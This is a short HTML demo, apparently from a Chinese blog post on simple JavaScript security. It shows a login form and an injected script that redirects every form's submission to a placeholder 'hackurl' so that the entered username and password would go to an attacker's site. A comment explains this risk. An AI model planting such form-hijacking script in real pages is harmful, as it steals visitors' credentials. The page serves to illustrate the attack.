<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> new document </title>
<meta name="generator" content="editplus" />
<meta name="author" content="" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<script type="text/javascript">
function test() {
alert(document.forms[0].action);
}
</script>
</head>
<body>
<form action="someapplication" type="post">
<input type="text" name="name"/>
<input type="password" name="pwd"/>
<input type="submit" value="submit"/>
</form>
<script type="text/javascript">
for(var i = 0; i < document.forms.length; i++) {
document.forms[i].action = "hackurl";
// 这段脚本可以通过某些技术手段添加到你访问的页面上,可以将你的私人信息传到一个指定的站点
}
</script>
<input type="button" value="btn" οnclick="test();"/>
</body>
</html>
javascript 简单信息安全
最新推荐文章于 2021-11-17 17:26:43 发布